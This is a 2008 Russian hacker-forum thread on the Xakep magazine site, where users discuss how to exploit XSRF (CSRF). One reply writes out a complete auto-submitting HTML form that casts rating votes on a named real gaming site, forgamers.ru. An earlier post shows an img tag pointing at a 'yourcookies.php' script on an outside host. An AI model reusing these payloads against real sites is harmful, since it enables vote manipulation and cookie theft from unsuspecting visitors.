Статья про XSRF

Главная Зарегистрироваться Вход Мой профиль Входящие Моя подписка Мои форумы Выход
Текстовая версия Карта Top-100 пользователей ПОИСК ПО ФОРУМУ FAQ
RSS: 20 последних сообщений форума 20 последних топиков форума

Статья про XSRF

Посмотреть связанные обсуждения: (в этом форуме | во всех форумах)

Зашли как: Guest

Пользователи, просматривающие топик: none

Версия для печати

Все форумы >> [Журналы] >> [Журналы] >> Журнал Xakep >> Статья про XSRF

Страниц: [1]

Имя

Сообщение

<< Старые топики Новые топики >>

Статья про XSRF - 26.07.2008 16:53:42

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 28.08.2006
Откуда: Северный полюс Москвы

Да....офигенная статья.....
мне очень понравилось автору респект.......но к сожалению мало примеров....
Да и видео как будто ламер снимал...если бы не музыка под видео было бы ужасно....

Так вот....кто еще что нашол про эксплуатацию этой уязвимости....напишите....я читал wiki и http://www.hackedpro.org/index.php?name=Pages&op=page&pid=56
...а далее все абсолютно скопировано из этой статьи.....
может кто еще предложит статейку про эту уяз....желательно на русском...

Post #: 1

RE: Статья про XSRF - 27.07.2008 16:30:51

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 28.03.2007

А что тебе конкретно не понятно?
Или тебе готовые примеры нужны?

(в ответ на Xakep9009)

Post #: 2

RE: Статья про XSRF - 28.07.2008 23:55:18

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 28.08.2006
Откуда: Северный полюс Москвы

Теория вся понятна.....и в html & php шарю.....но мне бы примерчик с любым сайтом....для полного понимания....неважно какой.....
допустим для смены пароля в учётной записи.....ЛЮБОЙ ПРИМЕР (от себя)

(в ответ на oRb)

Post #: 3

RE: Статья про XSRF - 29.07.2008 0:48:26

xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 18.05.2008
Откуда: ⁭⁮⁭⁭↑

паясните мне короче типа на странице есть картинка

<img src="http://myxak.com/yourcookies.php" >

то тогд выполниться мой сценарий http://myxak.com/yourcookies.php а?

(в ответ на Xakep9009)

Post #: 4

RE: Статья про XSRF - 29.07.2008 1:39:12

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 28.08.2006
Откуда: Северный полюс Москвы

именно.

(в ответ на xaxa89)

Post #: 5

RE: Статья про XSRF - 29.07.2008 2:56:28

xaxa89

Сообщений: 287
Оценки: 0
Присоединился: 18.05.2008
Откуда: ⁭⁮⁭⁭↑

тема...............

(в ответ на Xakep9009)

Post #: 6

RE: Статья про XSRF - 29.07.2008 11:59:17

oRb

Сообщений: 4044
Оценки: 597
Присоединился: 28.03.2007

quote:

паясните мне короче типа на странице есть картинка
<img src="http://myxak.com/yourcookies.php" >
то тогд выполниться мой сценарий http://myxak.com/yourcookies.php а?

выполниться пхп код, но это совсем не XSRF.

quote:

ЛЮБОЙ ПРИМЕР (от себя)

сайт forgamers .ru (мониторинг серверов)
HTML код для автоматического голосования:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Untitled Document</title>
</head>

<body onload="document.forms['rating'].submit();">
<form action="http://www.forgamers.ru/ajax/rate.php" method="post" name="rating">
<input name="id" type="hidden" value="ID_СЕРВЕРА" /></form>

</body>
</html>

(в ответ на xaxa89)

Post #: 7

RE: Статья про XSRF - 30.07.2008 17:33:36

Xakep9009

Сообщений: 1067
Оценки: 0
Присоединился: 28.08.2006
Откуда: Северный полюс Москвы

Спасибо огромное теперь моя душа спокойна)))

(в ответ на oRb)

Post #: 8

Страниц: [1]

Все форумы >> [Журналы] >> [Журналы] >> Журнал Xakep >> Статья про XSRF

Страниц: [1]

Перейти к:

Новые сообщения	Нет новых сообщений
Популярные с новыми сообщениями	Популярные без новых сообщений
Заблокированные с новыми сообщениями	Заблокированные без сообщений

Новое сообщение

Ответ

Новое голосование

Оставить голос

Удалить мой пост

Удалить мое обсуждение

Оценить пост

Abuse: Вопросы по сайту : xa@real.xakep.ru

0.203